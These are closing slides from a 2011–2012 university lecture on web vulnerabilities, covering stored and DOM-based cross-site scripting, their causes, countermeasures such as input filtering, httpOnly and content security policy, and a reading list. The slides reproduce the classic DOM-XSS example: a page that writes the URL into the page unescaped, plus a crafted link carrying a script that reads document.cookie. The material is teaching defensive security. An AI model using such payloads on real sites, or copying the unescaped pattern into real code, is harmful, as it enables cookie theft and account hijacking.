Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 70/86 2011-2012 70 / 86
81. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example I
Now let us logon as Jerry
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 71/86 2011-2012 71 / 86
82. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example II
And check Tom’s profile:
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 72/86 2011-2012 72 / 86
83. Some web injections vulnerabilities XSS - Cross-Site scripting
Stored XSS example III
P0wN3d!
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 73/86 2011-2012 73 / 86
84. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM based XSS / type 0 attack I
The web-server does not receive the payload anymore
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 74/86 2011-2012 74 / 86
85. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM based XSS / type 0 attack II
DOM XSS steps
1. searching for a valid URL on the website
2. searching for ways to run code within the browser from an
URL load request without sending it to the server
3. sending to the victim for the malicious URL
4. the browser loads the legitimate webpage
5. and runs the payload (without something noticeable on the
server side)
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 75/86 2011-2012 75 / 86
86. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM based XSS / type 0 attack III
Causes
[Paola 2011]
sources: input data controlled directly
or not by the attacker
sinks: potentially dangerous functions
filters: operations on sources which
change the content
badly designed client filters
focus on server side XSS detection, while this is a client problem
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 76/86 2011-2012 76 / 86
87. Some web injections vulnerabilities XSS - Cross-Site scripting
Document Object Model
DOM? a tree permitting accessing in a programmatic way objects
that are represented on a rendered webpage 11
11
[Document Object Model] Document Object Model
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 77/86 2011-2012 77 / 86
88. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM XSS example I
Classic example from the original DOM-XSS paper [Klein 2005] “DOM
Based Cross Site Scripting or XSS of the Third Kind”
http://www.vulnerable.site/welcome.html
1 <HTML >
<TITLE>Welcome!</TITLE>
3 Hi
<SCRIPT>
5 v a r p o s=document . URL . i n d e x O f ( ”name=” ) +5;
document . w r i t e ( document . URL . s u b s t r i n g ( pos , document . URL . l e n g t h
));
7 </SCRIPT>
<BR>
9 Welcome t o o u r s y s t e m
...
11 </HTML >
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 78/86 2011-2012 78 / 86
89. Some web injections vulnerabilities XSS - Cross-Site scripting
DOM XSS example II
normal usage:
http://www.vulnerable.site/welcome.html?name=Sophie
malicious crafted link:
1 h t t p : / /www . v u l n e r a b l e . s i t e / welcome . h t ml ?name=S o p h i e#b l a b l a <
s c r i p t > a l e r t ( document . c o o k i e ) ; </ s c r i p t >
... there are a lot of trickier stuff!
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 79/86 2011-2012 79 / 86
90. Some web injections vulnerabilities XSS - Cross-Site scripting
XSS counter-measures I
Input sanitization
client size: letting the user decide to run anything else than HTML
eg: [NoScript]
server side:
“proxy/stub” between the http server and the clients
filtering:
only allow a subset of characters
input and output filtering [HTMLPurifier], [AntiSamy project]...
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 80/86 2011-2012 80 / 86
91. Some web injections vulnerabilities XSS - Cross-Site scripting
XSS counter-measures II
both: httpOnly [httponly] (on most modern browsers, not possible
with document.cookie and XMLHTTPResponse, but still vulnerable if
using XMLHTTPRequest)
Stored
offline search in databases: fastidious (encoding, patterns), response
time?
DOM
Frozen-DOM [0x6D6172696F 2011]
X-Content-SecurityPolicy [Paola 2011]
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 81/86 2011-2012 81 / 86
92. Appendix For Further Reading
0x6D6172696F, Mario Heiderich (2011).
Locking the Throne Room - ECMA Script 5, a frozen DOM and the eradicati
http://www.hackinparis.com/slides/hip2k11/0
2-LockingTheThroneRoom.pdf http://mario.heideri.ch.
Amit, Yair (2010).
Cross-Site Scripting through Flash in Gmail Based Services.
http://blog.watchfire.com/wfblog/2010/03/cross-site-scripti
ng-through-flash-in-gmail-based-services.html.
CrazyDaVinci (2011). Autopost Spamming using Facebook Mobile XSS.
http://crazydavinci.net/2011/0
3/autopost-spamming-using-facebook-mobile-xss/.
Fabien Duchene Roland Groz, Sanjay Rawat Jean-Luc Richier (2012).
XSS Vulnerability Detection Using Model Inference Assisted Evolutionary Fuz
Hackipedia - SQL injection.
http://hakipedia.com/index.php/SQL_Injection.
Heiderich, Mario. HTML5 security. http://html5sec.org/.
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 82/86 2011-2012 82 / 86
93. Appendix For Further Reading
IBM, Paul Lee (2002). Cross-site scripting. https:
//www.ibm.com/developerworks/tivoli/library/s-csscript/.
Johan Adriaans, Pedro Laguna. Firefox hackbar add-on.
https://addons.mozilla.org/en-US/firefox/addon/hackbar/.
Klein, Amit (2005). “DOM Based Cross Site Scripting or XSS of the Third
Kind”. In:
http://www.webappsec.org/projects/articles/071105.shtml.
Kunz, Benjamin (2011).
Skype Vulnerabilities: Zero Day Exploitation 2011, HITBSecConf 2011 (Mala
http://conference.hitb.org/hitbsecconf2011kul/?page_id=1757.
Maone, Giorgio. NoScript.
https://addons.mozilla.org/en-US/firefox/addon/noscript/.
Mavituna - SQL injection sheet (2007).
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/.
OWASP. AntiSamy project. https:
//www.owasp.org/index.php/Category:OWASP_AntiSamy_Project.
— httponly. https://www.owasp.org/index.php/HTTPOnly.
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 83/86 2011-2012 83 / 86
94. Appendix For Further Reading
OWASP. WebGoat - the vulnerable web application. https:
//www.owasp.org/index.php/Category:OWASP_WebGoat_Project.
— (2011). Injection - OWASP top 10 - 2010.
https://www.owasp.org/index.php/Top_10_2010-A1.
Paola, Stefano Di (2011). DOM Xss Identification and Exploitation.
http://media.hacking-lab.com/scs3/scs3_pdf/SCS3_201
1_Di_Paola.pdf.
Philippe De Ryck, Lieven Desmet. CsFire firefox add-on.
https://addons.mozilla.org/en-US/firefox/addon/csfire/.
RSnake. XSS. http://ha.ckers.org/xss.html.
Ryck, Philippe De et al. (2011). “Automatic and Precise Client-Side
Protection against CSRF Attacks”. In: https:
//lirias.kuleuven.be/bitstream/123456789/311551/1/paper.pdf.
ESORICS.
Samuel, Justin. RequestPolicy firefox add-on. https:
//addons.mozilla.org/en-US/firefox/addon/requestpolicy/.
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 84/86 2011-2012 84 / 86
95. Appendix For Further Reading
Symantec (2009).
Symantec Global Internet Security Threat Report - trends for 2008.
http://eval.symantec.com/mktginfo/enterprise/white_papers/
b-whitepaper_internet_security_threat_report_xiv_04-200
9.en-us.pdf.
Wassermann, Gary Michael (2008).
Techniques and Tools for Engineering Secure Web Applications. Ph.D.
thesis.
Webgoat - numeric SQL injection.
http://yehg.net/lab/pr0js/training/view/owasp/webgoat/Web
Goat_InjectionFlaws_NumericSQLInject/WebGoat_Injection
Flaws_NumericSQLInject.html.
Wikipedia. Document Object Model.
https://secure.wikimedia.org/wikipedia/en/wiki/Document_
Object_Model.
Yang, Edward Z. HTMLPurifier. http://htmlpurifier.org/.
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 85/86 2011-2012 85 / 86
96. Bonus slides XSS
Also see
Some tricks to escape browser protections [XSS]
[HTML5 security]
Fabien Duchene (LIG) 4MMSR-3-Web vulnerabilities and attacks 86/86 2011-2012 86 / 86